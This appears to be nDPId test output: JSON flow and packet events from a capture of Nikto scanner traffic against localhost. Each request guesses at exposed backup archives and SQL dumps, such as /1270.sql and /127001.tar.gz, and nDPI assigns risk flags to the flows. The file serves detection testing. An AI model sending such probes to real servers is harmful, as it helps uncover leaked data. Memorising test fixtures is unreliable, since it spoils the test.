00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":386,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277284,"flow_last_seen":1576420277284,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277284,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50316,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_packet_id":1,"flow_last_seen":1576420277284,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277284,"pkt":"AAAAAAAAAAAAAAAACABFAADDCzNAAEAGMQB\/AAABfwAAAcSMH5CEzzOZEWOd+IAYAED+twAAAQEICp1m\/UydZv1MR0VUIC8xMjcuMC4wLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277284,"flow_last_seen":1576420277284,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277284,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50316,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":387,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277286,"flow_last_seen":1576420277286,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277286,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50318,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_packet_id":1,"flow_last_seen":1576420277286,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277286,"pkt":"AAAAAAAAAAAAAAAACABFAAC9CzBAAEAGMQl\/AAABfwAAAcSOH5AKIDOIyoTTQIAYAED+sQAAAQEICp1m\/U2dZv1NR0VUIC8xLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277286,"flow_last_seen":1576420277286,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277286,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50318,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":388,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277288,"flow_last_seen":1576420277288,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277288,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50320,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":388,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_packet_id":1,"flow_last_seen":1576420277288,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277288,"pkt":"AAAAAAAAAAAAAAAACABFAAC9JlVAAEAGFeR\/AAABfwAAAcSQH5Clfx76D\/AiGIAYAED+sQAAAQEICp1m\/VCdZv1QR0VUIC8xLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":388,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277288,"flow_last_seen":1576420277288,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277288,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50320,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277291,"flow_last_seen":1576420277291,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277291,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50322,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_packet_id":1,"flow_last_seen":1576420277291,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277291,"pkt":"AAAAAAAAAAAAAAAACABFAADCVkJAAEAG5fF\/AAABfwAAAcSSH5BxEW7rgO+zGYAYAED+tgAAAQEICp1m\/VOdZv1SR0VUIC8xMjcwMDEudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277291,"flow_last_seen":1576420277291,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277291,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50322,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277292,"flow_last_seen":1576420277292,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277292,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50324,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_packet_id":1,"flow_last_seen":1576420277292,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277292,"pkt":"AAAAAAAAAAAAAAAACABFAADC9VNAAEAGRuB\/AAABfwAAAcSUH5A3Js37LMn8joAYAED+tgAAAQEICp1m\/VSdZv1UR0VUIC8xMjcwMDEudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277292,"flow_last_seen":1576420277292,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277292,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50324,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":391,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277293,"flow_last_seen":1576420277293,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277293,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50326,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_packet_id":1,"flow_last_seen":1576420277293,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277293,"pkt":"AAAAAAAAAAAAAAAACABFAADB0lRAAEAGaeB\/AAABfwAAAcSWH5D4eer6AmSqt4AYAED+tQAAAQEICp1m\/VWdZv1VR0VUIC8xLnRhci5iejIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":391,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277293,"flow_last_seen":1576420277293,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277293,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50326,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":392,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277295,"flow_last_seen":1576420277295,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277295,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50328,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_packet_id":1,"flow_last_seen":1576420277295,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277295,"pkt":"AAAAAAAAAAAAAAAACABFAADBgrRAAEAGuYB\/AAABfwAAAcSYH5BqProaPd\/PWYAYAED+tQAAAQEICp1m\/VedZv1XR0VUIC8xLnRhci5iejIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":392,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277295,"flow_last_seen":1576420277295,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277295,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50328,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":393,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277296,"flow_last_seen":1576420277296,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277296,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50330,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_packet_id":1,"flow_last_seen":1576420277296,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277296,"pkt":"AAAAAAAAAAAAAAAACABFAADFhERAAEAGt+x\/AAABfwAAAcSaH5DLx7zvpnN3coAYAED+uQAAAQEICp1m\/VidZv1YR0VUIC8xMjcwMDEudGFyLmd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":393,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277296,"flow_last_seen":1576420277296,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277296,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50330,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":394,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277298,"flow_last_seen":1576420277298,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50332,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_packet_id":1,"flow_last_seen":1576420277298,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277298,"pkt":"AAAAAAAAAAAAAAAACABFAADFkbNAAEAGqn1\/AAABfwAAAcScH5DniakeYsnjE4AYAED+uQAAAQEICp1m\/VqdZv1aR0VUIC8xMjcwMDEudGFyLmd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":394,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277298,"flow_last_seen":1576420277298,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50332,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":395,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277299,"flow_last_seen":1576420277299,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277299,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50334,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_packet_id":1,"flow_last_seen":1576420277299,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277299,"pkt":"AAAAAAAAAAAAAAAACABFAADATXFAAEAG7sR\/AAABfwAAAcSeH5C5OnXDLQhZdIAYAED+tAAAAQEICp1m\/VudZv1bR0VUIC8xMjcwLnNxbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":395,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277299,"flow_last_seen":1576420277299,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277299,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50334,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":396,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277301,"flow_last_seen":1576420277301,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277301,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50336,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_packet_id":1,"flow_last_seen":1576420277301,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277301,"pkt":"AAAAAAAAAAAAAAAACABFAADAvp1AAEAGfZh\/AAABfwAAAcSgH5BBBoY3\/wT40oAYAED+tAAAAQEICp1m\/V2dZv1dR0VUIC8xMjcwLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":396,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277301,"flow_last_seen":1576420277301,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277301,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50336,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
